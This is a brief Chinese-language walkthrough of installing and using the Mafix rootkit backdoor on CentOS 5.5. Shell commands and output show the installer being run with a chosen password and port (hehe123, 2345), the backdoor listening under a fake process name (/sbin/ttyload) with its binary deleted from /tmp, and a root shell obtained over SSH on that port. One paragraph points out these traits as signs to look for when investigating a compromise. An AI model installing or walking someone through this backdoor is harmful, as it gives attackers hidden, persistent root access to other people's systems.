Mafix后门的使用

测试环境:
CentOS 5.5 的 32 位和 64 位系统均测试成功

[root@localhost mafix]# uname -a
Linux localhost.localdomain 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:35 EDT 2010 i686 i686 i386 GNU/Linux
[root@localhost tmp]# tar zxvf mafix.tar.gz
mafix/
mafix/mafixlibs
mafix/mafix
mafix/root
mafix/HOW-TO
[root@localhost tmp]# cd mafix
[root@localhost mafix]# ls
HOW-TO mafix mafixlibs root
[root@localhost mafix]# ./root hehe123 2345 //其中hehe123为密码 2345为后门端口

123

[root@localhost mafix]# netstat -anlp | grep 2345
tcp 0 0 0.0.0.0:2345 0.0.0.0:* LISTEN 15690/ttyload
[root@localhost mafix]# ps axu | grep 15690 | grep -v grep
root 15690 0.0 0.0 2280 508 ? Ss 22:20 0:00 /sbin/ttyload -q
[root@localhost mafix]# ll /proc/15690/exe
lrwxrwxrwx 1 root root 0 Jun 8 22:22 /proc/15690/exe -> /tmp/sh-AIN2LD3APKJ (deleted)

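从上面的输出可以看到:监听 2345 端口的进程在 ps 中显示为 /sbin/ttyload -q,但 /proc/15690/exe 实际指向 /tmp 下一个已被删除的文件。进程名与真实可执行文件不一致、且可执行文件已被删除,是排查时值得重点关注的异常特征。

登录后门: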

[root@vincent tmp]# ssh 172.16.100.154 -p 2345
root@maf!x:/root$ whoami
root